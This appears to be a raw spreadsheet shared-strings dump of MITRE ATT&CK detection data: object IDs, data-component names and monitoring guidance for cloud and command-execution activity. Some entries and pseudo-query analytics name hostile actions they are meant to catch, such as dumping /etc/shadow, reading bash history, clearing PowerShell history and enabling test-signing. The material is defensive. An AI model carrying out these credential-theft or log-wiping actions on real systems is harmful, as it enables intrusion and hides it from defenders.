    <t>attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53</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</si>
  <si>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</si>
  <si>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relationship--51b44905-4efe-46f7-968b-feee7401c641</t>
  </si>
  <si>
    <t>attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634</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</si>
  <si>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</si>
  <si>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relationship--122d4f4e-7868-44f3-b838-abe6df94e5e8</t>
  </si>
  <si>
    <t>attack-pattern--bf147104-abf9-4221-95d1-e81585859441</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</si>
  <si>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</si>
  <si>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relationship--8a6329c5-41c8-44f3-9376-837c39e77de7</t>
  </si>
  <si>
    <t>attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44</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</si>
  <si>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</si>
  <si>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relationship--74543008-8a06-4f14-b135-413bc83d6232</t>
  </si>
  <si>
    <t>attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d</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</si>
  <si>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</si>
  <si>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relationship--a12e819a-094f-4d20-b666-7d3260eb8996</t>
  </si>
  <si>
    <t>attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119</t>
  </si>
  <si>
    <t>relationship--89d236d7-a19b-4f63-875e-007705ae6bb2</t>
  </si>
  <si>
    <t>attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c</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</si>
  <si>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</si>
  <si>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relationship--b419439a-ab5d-4ff7-80c1-8300f29872d7</t>
  </si>
  <si>
    <t>attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce</t>
  </si>
  <si>
    <t>Monitor for logging, messaging, and other artifacts provided by cloud services.</t>
  </si>
  <si>
    <t>relationship--9262b21e-8519-4cf5-895a-2c17c986ac8a</t>
  </si>
  <si>
    <t>attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b</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</si>
  <si>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</si>
  <si>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relationship--b0b3d5ca-c072-4f2e-9c08-4262a27d7ae0</t>
  </si>
  <si>
    <t>attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a</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</si>
  <si>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</si>
  <si>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relationship--2267876a-6c6a-4944-9bf2-eaf8e41b087c</t>
  </si>
  <si>
    <t>attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a</t>
  </si>
  <si>
    <t>In Office365 environments, consider using PurviewAudit to collect MailItemsAccessed events and monitoring for unusual email access behavior.(Citation: Mandiant Cloudy Logs 2023)</t>
  </si>
  <si>
    <t>relationship--33296fc2-5d9f-4a7b-a271-93eb8b7fbc4b</t>
  </si>
  <si>
    <t>attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a</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</si>
  <si>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</si>
  <si>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relationship--a602aa34-5b1d-4b46-93e7-21252e85a656</t>
  </si>
  <si>
    <t>attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26</t>
  </si>
  <si>
    <t>relationship--72f4d17a-be89-446a-a728-133cb7048ab9</t>
  </si>
  <si>
    <t>attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb</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</si>
  <si>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</si>
  <si>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relationship--179fbf03-5368-4c4b-a628-e2cf8b27c779</t>
  </si>
  <si>
    <t>attack-pattern--e848506b-8484-4410-8017-3d235a52f5b3</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</si>
  <si>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</si>
  <si>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relationship--4b66eefd-8731-4c36-bee3-88e87c9f41d3</t>
  </si>
  <si>
    <t>attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858</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</si>
  <si>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</si>
  <si>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relationship--097b1c10-b2ff-4dba-ad13-476120d96539</t>
  </si>
  <si>
    <t>attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a</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</si>
  <si>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</si>
  <si>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relationship--76c371ac-378f-4fed-81c3-9807c8765dd9</t>
  </si>
  <si>
    <t>attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414</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</si>
  <si>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</si>
  <si>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relationship--9f18f3f3-7f5b-4e54-b4de-d58202d88a28</t>
  </si>
  <si>
    <t>attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597</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</si>
  <si>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</si>
  <si>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relationship--5470513c-97dd-4f7f-9ebe-04037a18fe8c</t>
  </si>
  <si>
    <t>attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc</t>
  </si>
  <si>
    <t>relationship--b559ee80-3a71-4e2c-971a-4e575b5b8a19</t>
  </si>
  <si>
    <t>attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7</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</si>
  <si>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</si>
  <si>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relationship--568e3a13-be72-4e1b-8bf0-bdfc6fa3dc2b</t>
  </si>
  <si>
    <t>attack-pattern--2d3f5b3c-54ca-4f4d-bb1f-849346d31230</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</si>
  <si>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</si>
  <si>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relationship--56cf4996-1a39-483f-b32a-94874228ec06</t>
  </si>
  <si>
    <t>attack-pattern--f870408c-b1cd-49c7-a5c7-0ef0fc496cc6</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</si>
  <si>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</si>
  <si>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relationship--4026cbce-db36-4716-95b5-68cefbe10f27</t>
  </si>
  <si>
    <t>attack-pattern--6a5d222a-a7e0-4656-b110-782c33098289</t>
  </si>
  <si>
    <t>Monitor call logs from corporate devices to identify patterns of potential voice phishing, such as calls to/from known malicious phone numbers.</t>
  </si>
  <si>
    <t>relationship--f283735e-e339-40c7-ba49-30f8d81878e8</t>
  </si>
  <si>
    <t>attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974</t>
  </si>
  <si>
    <t>Monitor call logs from corporate devices to identify patterns of potential voice phishing, such as calls to/from known malicious phone numbers. Correlate these records with system events.</t>
  </si>
  <si>
    <t>relationship--3100a612-59cf-4fb0-b5f0-d0e09198a487</t>
  </si>
  <si>
    <t>attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for third-party application logging, messaging, and/or other artifacts that may send spearphishing messages via third-party services in an attempt to gain access to victim systems. </t>
  </si>
  <si>
    <t>relationship--c3ccb220-9cef-4531-91df-d2414eee65be</t>
  </si>
  <si>
    <t>Ensure CA audit logs are enabled and monitor these services for signs of abuse.(Citation: SpecterOps Certified Pre Owned)</t>
  </si>
  <si>
    <t>relationship--566f99e4-d29f-4b73-a515-aa919ac89957</t>
  </si>
  <si>
    <t>attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1</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</si>
  <si>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</si>
  <si>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relationship--d313baee-7fc6-4c44-a2d8-84ddcb627faf</t>
  </si>
  <si>
    <t>attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925</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</si>
  <si>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</si>
  <si>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relationship--ec66e3d3-b67a-44c8-96d1-4f6ddc8a08ab</t>
  </si>
  <si>
    <t>attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517</t>
  </si>
  <si>
    <t>relationship--1ee7faf3-45f6-451f-b966-d0f3ea9e9cca</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</si>
  <si>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</si>
  <si>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relationship--1b47403e-e95f-4641-9e8c-588b44b49327</t>
  </si>
  <si>
    <t>attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5</t>
  </si>
  <si>
    <t>Monitor for third-party application logging, messaging, and/or other artifacts that may rely upon specific actions by a user in order to gain execution.</t>
  </si>
  <si>
    <t>relationship--ed29b2b8-3f48-4bbe-a70b-b4e350820dcd</t>
  </si>
  <si>
    <t>attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0</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</si>
  <si>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</si>
  <si>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relationship--c49ddd81-075e-491a-9eb7-69ff7c55b81c</t>
  </si>
  <si>
    <t>attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb</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</si>
  <si>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</si>
  <si>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relationship--14358f61-0f7e-404b-bbf5-1219f1079c51</t>
  </si>
  <si>
    <t>Certificate Registration</t>
  </si>
  <si>
    <t>x-mitre-data-component--1dad5aa4-4bb5-45e4-9e42-55d40003cfa6</t>
  </si>
  <si>
    <t>attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421</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</si>
  <si>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</si>
  <si>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relationship--6241b1fa-d49e-4c0f-82a7-08424f95abf7</t>
  </si>
  <si>
    <t>attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1</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</si>
  <si>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</si>
  <si>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relationship--0b3fcc39-fb57-45a6-a491-e5bcd9a29d51</t>
  </si>
  <si>
    <t>Cloud Service Disable</t>
  </si>
  <si>
    <t>x-mitre-data-component--ec0612c5-2644-4c50-bcac-82586974fedd</t>
  </si>
  <si>
    <t>attack-pattern--cacc40da-4c9e-462c-80d5-fd70a178b12d</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</si>
  <si>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</si>
  <si>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relationship--f25b9b24-7c42-42b2-941f-6cb8653043c9</t>
  </si>
  <si>
    <t>attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529</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</si>
  <si>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</si>
  <si>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relationship--501000d2-04db-4f89-96fe-2eef2e46bc43</t>
  </si>
  <si>
    <t>14 April 2022</t>
  </si>
  <si>
    <t>Cloud Service Enumeration</t>
  </si>
  <si>
    <t>x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac</t>
  </si>
  <si>
    <t>attack-pattern--cfb525cc-5494-401d-a82b-2539ca46a561</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</si>
  <si>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</si>
  <si>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relationship--63f16da3-80c8-40e5-ab7d-638446f2b509</t>
  </si>
  <si>
    <t>attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db</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</si>
  <si>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</si>
  <si>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relationship--689042a3-f33e-47aa-b544-a3d823f71c1c</t>
  </si>
  <si>
    <t>attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0</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</si>
  <si>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</si>
  <si>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relationship--c97e1a14-d6e6-4d62-add5-32680fb8649a</t>
  </si>
  <si>
    <t>attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88</t>
  </si>
  <si>
    <t>relationship--f6ede604-af42-4c2b-8324-454af2380b24</t>
  </si>
  <si>
    <t>Cloud Service Metadata</t>
  </si>
  <si>
    <t>x-mitre-data-component--b33d36e3-d7ea-4895-8eed-19a08a8f7c4f</t>
  </si>
  <si>
    <t>attack-pattern--144e007b-e638-431d-a894-45d90c54ab90</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</si>
  <si>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</si>
  <si>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relationship--98c97f93-8c2a-4497-8c83-b841e30c4fa2</t>
  </si>
  <si>
    <t>Cloud Service Modification</t>
  </si>
  <si>
    <t>x-mitre-data-component--e52d89f9-1710-4708-88a5-cbef77c4cd5e</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor changes made to cloud services for unexpected modifications to settings and/or data </t>
  </si>
  <si>
    <t>relationship--7dd3aec9-79b3-4482-b45e-f76b498f57f4</t>
  </si>
  <si>
    <t>attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db</t>
  </si>
  <si>
    <t>Monitor the creation and modification of cloud resources that may be abused for persistence, such as functions and workflows monitoring cloud events.</t>
  </si>
  <si>
    <t>relationship--df448a33-e3b7-495e-98a7-ea1793d547d4</t>
  </si>
  <si>
    <t>Monitor changes made to cloud services for unexpected modifications to settings and/or data.</t>
  </si>
  <si>
    <t>relationship--8f4eca0c-db40-481a-8dac-1b2f0c6dfd9c</t>
  </si>
  <si>
    <t>attack-pattern--ca00366b-83a1-4c7b-a0ce-8ff950a7c87f</t>
  </si>
  <si>
    <t>relationship--a789a8cd-356f-4211-bffd-7ad1197b65a3</t>
  </si>
  <si>
    <t>Monitor the creation and modification of serverless resources such as functions and workflows.</t>
  </si>
  <si>
    <t>relationship--29913145-ac8a-4075-961a-0600ba229728</t>
  </si>
  <si>
    <t>Cloud Storage Access</t>
  </si>
  <si>
    <t>x-mitre-data-component--58ef998c-f3bf-4985-b487-b1005f5c05d1</t>
  </si>
  <si>
    <t>attack-pattern--8565825b-21c8-4518-b75e-cbc4c717a156</t>
  </si>
  <si>
    <t>relationship--2160c4c2-9828-418e-ab5f-faec0593ea9d</t>
  </si>
  <si>
    <t>attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7</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</si>
  <si>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</si>
  <si>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relationship--963065c2-36e5-426c-8580-a109ad0d7b60</t>
  </si>
  <si>
    <t>relationship--148cea73-07d4-4913-ab89-a1edd112253f</t>
  </si>
  <si>
    <t>Cloud Storage Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--59ec10d9-546b-4b8e-bccb-fa85f71e5055</t>
  </si>
  <si>
    <t>attack-pattern--d4bdbdea-eaec-4071-b4f9-5105e12ea4b6</t>
  </si>
  <si>
    <t>Monitor account activity for attempts to create and share data, such as snapshots or backups, with untrusted or unusual accounts.</t>
  </si>
  <si>
    <t>relationship--ba20a182-4500-43b5-bf19-796083e1633b</t>
  </si>
  <si>
    <t>Cloud Storage Deletion</t>
  </si>
  <si>
    <t>x-mitre-data-component--4c41e296-b8d2-4a37-b789-eb565c87c00c</t>
  </si>
  <si>
    <t>attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c</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</si>
  <si>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</si>
  <si>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relationship--e3853acc-d1c3-4ca9-ae6d-c53e01de1c4b</t>
  </si>
  <si>
    <t>attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of a cloud storage objects (ex: AWS `delete-object`), especially those associated with cloud backups.</t>
  </si>
  <si>
    <t>relationship--6ddf2f6b-6174-43fe-ba71-7549dcd321f3</t>
  </si>
  <si>
    <t>Cloud Storage Enumeration</t>
  </si>
  <si>
    <t>x-mitre-data-component--fcc4811f-9cc8-4db5-8097-4d8242a380de</t>
  </si>
  <si>
    <t>attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d</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</si>
  <si>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</si>
  <si>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relationship--66655f1e-fe9e-487c-a4e2-4716e16aa609</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</si>
  <si>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</si>
  <si>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relationship--c3c63f57-cd55-4b9e-8bdc-c98be4b2d046</t>
  </si>
  <si>
    <t>Cloud Storage Metadata</t>
  </si>
  <si>
    <t>x-mitre-data-component--e214eb6d-de8f-4154-9015-6d47915fbed1</t>
  </si>
  <si>
    <t>Periodically baseline cloud storage infrastructure to identify malicious modifications or additions.</t>
  </si>
  <si>
    <t>relationship--80fb3f0f-32d9-43e4-b055-4fb0d8a531fb</t>
  </si>
  <si>
    <t>Cloud Storage Modification</t>
  </si>
  <si>
    <t>x-mitre-data-component--45977f14-1bcc-4ec4-ac14-a30fd3a11f44</t>
  </si>
  <si>
    <t>attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0</t>
  </si>
  <si>
    <t>Monitor for changes made in cloud environments for events that indicate storage objects have been anomalously modified.</t>
  </si>
  <si>
    <t>relationship--7961b5e5-0404-4aa6-9f0d-e3f5c9b7356a</t>
  </si>
  <si>
    <t>Monitor for anomalous file transfer activity between accounts and/or to untrusted/unexpected VPCs.</t>
  </si>
  <si>
    <t>relationship--02916665-5ab0-4015-9cd1-382550129011</t>
  </si>
  <si>
    <t>Command Execution</t>
  </si>
  <si>
    <t>x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0</t>
  </si>
  <si>
    <t>attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to dump the contents of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to enable offline password cracking.</t>
  </si>
  <si>
    <t>relationship--e1ae4cbd-d6af-4dec-8b30-f9b71b8606ba</t>
  </si>
  <si>
    <t>attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions.</t>
  </si>
  <si>
    <t>relationship--4826c1d5-4861-48bb-889d-c7d69dd5520e</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</si>
  <si>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</si>
  <si>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relationship--5fea3b6d-2b9b-4d5e-ba3b-884689f5e2ea</t>
  </si>
  <si>
    <t>attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5</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</si>
  <si>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</si>
  <si>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relationship--75d3d753-2276-4409-bf3d-df5e299ceb16</t>
  </si>
  <si>
    <t>attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08</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</si>
  <si>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</si>
  <si>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relationship--d1c822a9-efbd-42d6-9627-60cc5348bf0f</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</si>
  <si>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</si>
  <si>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relationship--354b4d10-aa58-462e-ba7e-c99d1da51f46</t>
  </si>
  <si>
    <t>attack-pattern--22522668-ddf6-470b-a027-9d6866679f67</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may achieve persistence by adding a Registry key to the Active Setup of the local machine.</t>
  </si>
  <si>
    <t>relationship--2f2f1098-bbb1-4b9b-a131-7dfd4a350af2</t>
  </si>
  <si>
    <t>attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor executed commands and arguments that may abuse Microsoft Office add-ins to obtain persistence on a compromised system. </t>
  </si>
  <si>
    <t>relationship--be1cb1fc-51c3-499a-8e14-16136f396f30</t>
  </si>
  <si>
    <t>attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes.</t>
  </si>
  <si>
    <t>relationship--64f86be9-606f-4255-bd62-e4ea3248fd40</t>
  </si>
  <si>
    <t>attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.</t>
  </si>
  <si>
    <t>relationship--3489e01e-e104-47d4-87fe-406269d8fdb9</t>
  </si>
  <si>
    <t>attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb</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</si>
  <si>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</si>
  <si>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relationship--668f6de8-d442-4817-b97f-e3c8dbf6ca7c</t>
  </si>
  <si>
    <t>attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for sdbinst.exe for potential indications of application shim abuse.</t>
  </si>
  <si>
    <t>relationship--58d47d06-26a8-4943-afb9-e2d3cf1d96ee</t>
  </si>
  <si>
    <t>attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830</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</si>
  <si>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&lt;h4&gt; Analytic 1 - Suspicious Commands &lt;/h4&gt;
&lt;code&gt; suspicious_commands = filter commands where event_id == "4103" AND
  ((command_line LIKE '%Get-Process%' AND command_line_parameter LIKE '%mainWindowTitle%'))&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--5da52674-0e47-431e-b00a-d27dfdba373b</t>
  </si>
  <si>
    <t>attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor executed commands and arguments for actions that will aid in compression or encrypting data that is collected prior to exfiltration, such as tar. </t>
  </si>
  <si>
    <t>relationship--1da6b7d8-12d3-436a-a97d-ae8fbd74c2ac</t>
  </si>
  <si>
    <t>attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662</t>
  </si>
  <si>
    <t>relationship--ce4756bd-122b-4bdd-9597-25d75f930583</t>
  </si>
  <si>
    <t>attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0</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</si>
  <si>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</si>
  <si>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relationship--22ba966c-e07e-4718-821c-4a57fe3705ad</t>
  </si>
  <si>
    <t>16 April 2022</t>
  </si>
  <si>
    <t>attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967</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</si>
  <si>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</si>
  <si>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relationship--31ca2106-a54f-4511-8319-f82367a7d293</t>
  </si>
  <si>
    <t>attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse authentication packages to execute DLLs when the system boots.</t>
  </si>
  <si>
    <t>relationship--2bbf8a2c-13e9-4fd8-87ba-fcaa63f65ad2</t>
  </si>
  <si>
    <t>attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be taken to collect internal data.</t>
  </si>
  <si>
    <t>relationship--bc8d1943-a146-422f-8d98-d31fce56202f</t>
  </si>
  <si>
    <t>attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection</t>
  </si>
  <si>
    <t>relationship--16da9dfb-ffa0-4137-8ac0-c935dc7f03fe</t>
  </si>
  <si>
    <t>attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7</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</si>
  <si>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</si>
  <si>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relationship--537e95cc-b972-4d25-bc0d-273d437bc534</t>
  </si>
  <si>
    <t>attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3</t>
  </si>
  <si>
    <t>While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like &lt;code&gt;cat ~/.bash_history&lt;/code&gt;.</t>
  </si>
  <si>
    <t>relationship--cb4fd342-3356-4289-9661-97b5d762bc89</t>
  </si>
  <si>
    <t>attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.</t>
  </si>
  <si>
    <t>relationship--3940a530-9590-4861-8323-4ab3ba5100f7</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may consist of logon scripts for unusual access by abnormal users or at abnormal times.</t>
  </si>
  <si>
    <t>relationship--471f9672-c5f0-4620-a7c1-4f48c0ad983c</t>
  </si>
  <si>
    <t>attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for usage of the profiles tool, such as profiles install -type=configuration.</t>
  </si>
  <si>
    <t>relationship--d3ad364c-efd4-48f6-9458-486b882d2e71</t>
  </si>
  <si>
    <t>attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7</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</si>
  <si>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</si>
  <si>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relationship--86a37939-7e17-4925-b0bb-5e84c9c53812</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.</t>
  </si>
  <si>
    <t>relationship--925b4737-5a74-4cee-9335-2534f7ae7c94</t>
  </si>
  <si>
    <t>attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may bypass UAC mechanisms to elevate process privileges on system.</t>
  </si>
  <si>
    <t>relationship--83f2e5dd-e4a3-4e52-98f9-7a18e9f9c568</t>
  </si>
  <si>
    <t>attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49</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</si>
  <si>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</si>
  <si>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relationship--d64b5eaf-493c-4bb0-b4bc-c911de6f497d</t>
  </si>
  <si>
    <t>attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335</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</si>
  <si>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</si>
  <si>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relationship--c5ae5910-07ed-42f5-a51f-bca546d52885</t>
  </si>
  <si>
    <t>attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530</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</si>
  <si>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</si>
  <si>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relationship--cb9959c5-377b-4278-8a55-2c8863f96f23</t>
  </si>
  <si>
    <t>attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence by executing malicious content triggered by a file type association.</t>
  </si>
  <si>
    <t>relationship--0e1e4e48-7a84-465e-8ac3-fe696b5e6f54</t>
  </si>
  <si>
    <t>attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a</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</si>
  <si>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&lt;h4&gt;Analytic 1 : Clear Powershell Console Command History &lt;/h4&gt;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Analytic 2 : Powershell Commands &lt;/h4&gt;
&lt;code&gt; suspicious_commands = filter CommandName, CommandType where 
  event_id == "4103" AND
  (CommandName LIKE '%Clear-History%' OR
   (CommandName LIKE '%Remove-Item%' AND CommandParameterValue LIKE '%ConsoleHost_history.text%')) &lt;/code&gt;
</t>
  </si>
  <si>
    <t>relationship--e9ada3b5-26b5-468c-864f-c8f5806ed453</t>
  </si>
  <si>
    <t>attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be taken to remove or overwrite system logs.</t>
  </si>
  <si>
    <t>relationship--d9229489-4c85-4125-945f-6081f2f99f43</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</si>
  <si>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</si>
  <si>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relationship--8f0e36c0-2f8b-4420-8797-c2bd2ec3dd21</t>
  </si>
  <si>
    <t>11 July 2022</t>
  </si>
  <si>
    <t>attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor executed commands and arguments that may delete or alter malicious network configuration settings as well as generated artifacts on a host system, including logs and files such as &lt;code&gt;Default.rdp&lt;/code&gt; or &lt;code&gt;/var/log/&lt;/code&gt;. </t>
  </si>
  <si>
    <t>relationship--8cb06a4f-49fd-4da3-bbb2-1273db12de85</t>
  </si>
  <si>
    <t>04 August 2022</t>
  </si>
  <si>
    <t>attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may delete or alter generated artifacts associated with persistence on a host system.</t>
  </si>
  <si>
    <t>relationship--f0229730-6d8a-4ec7-bd2d-07b5f429aed3</t>
  </si>
  <si>
    <t>attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2</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</si>
  <si>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</si>
  <si>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relationship--22215706-6254-4c24-8ca0-39a770b23ec9</t>
  </si>
  <si>
    <t>attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments to collect data stored in the clipboard from users copying information within or between applications.</t>
  </si>
  <si>
    <t>relationship--ca509010-11dc-491b-9ec1-e1329d73c396</t>
  </si>
  <si>
    <t>attack-pattern--55bb4471-ff1f-43b4-88c1-c9384ec47abf</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</si>
  <si>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</si>
  <si>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relationship--a043c97b-dde1-4f0b-8a8c-78f62784b1e1</t>
  </si>
  <si>
    <t>10 April 2023</t>
  </si>
  <si>
    <t>attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe</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</si>
  <si>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</si>
  <si>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relationship--a1c93044-e51b-483b-88d9-1e22e394a6dd</t>
  </si>
  <si>
    <t>attack-pattern--d94b3ae9-8059-4989-8e9f-ea0f601f80a7</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</si>
  <si>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</si>
  <si>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relationship--7522210d-4941-4f68-a582-dfc5d8d97199</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for executed commands and arguments that may attempt to find cloud groups and permission settings. </t>
  </si>
  <si>
    <t>relationship--1116b91b-3b1e-41a3-a60b-677f06eb810b</t>
  </si>
  <si>
    <t>attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c</t>
  </si>
  <si>
    <t>Monitor for the execution of commands that could modify the code signing policy of a system, such as &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt;. (Citation: Microsoft TESTSIGNING Feb 2021)</t>
  </si>
  <si>
    <t>relationship--5572fe7a-65fd-4fda-88ba-3e0b5711876d</t>
  </si>
  <si>
    <t>attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377</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</si>
  <si>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</si>
  <si>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relationship--5b1c9c38-7abd-4e2e-8a67-2d15f91eabec</t>
  </si>
  <si>
    <t>attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830</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</si>
  <si>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</si>
  <si>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relationship--bbc6216d-3a55-41bf-a6dd-abb031aa3f50</t>
  </si>
  <si>
    <t>attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be taken to gather common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.</t>
  </si>
  <si>
    <t>relationship--2c4c3a07-315f-42ef-b815-415ea9751530</t>
  </si>
  <si>
    <t>attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps)</t>
  </si>
  <si>
    <t>relationship--be88a67a-191e-4497-ade8-13b74b88e0ef</t>
  </si>
  <si>
    <t>attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae</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</si>
  <si>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</si>
  <si>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relationship--f2621533-86be-48f1-855f-36624f9e6064</t>
  </si>
  <si>
    <t>attack-pattern--f8ef3a62-3f44-40a4-abca-761ab235c436</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</si>
  <si>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</si>
  <si>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relationship--285ff280-83a7-4c2a-810a-a41a307533c0</t>
  </si>
  <si>
    <t>attack-pattern--7b50a1d3-4ca7-45d1-989d-a6503f04bfe1</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</si>
  <si>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</si>
  <si>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relationship--1be2f89a-1584-486a-b5e0-5735ee0a7a1f</t>
  </si>
  <si>
    <t>attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f</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</si>
  <si>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</si>
  <si>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relationship--7934d190-f6b7-48d2-8489-d17dd8dfdf10</t>
  </si>
  <si>
    <t>attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that are associated with account creation, such as net user or useradd</t>
  </si>
  <si>
    <t>relationship--783e717c-f94d-4f3b-a067-0c9af7dce809</t>
  </si>
  <si>
    <t>attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf</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</si>
  <si>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</si>
  <si>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relationship--54785e03-e2dd-42f5-8b16-59eb2c039eb9</t>
  </si>
  <si>
    <t>attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5</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</si>
  <si>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</si>
  <si>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relationship--eab2fc42-07cf-48d1-9bef-f32d11861cf6</t>
  </si>
  <si>
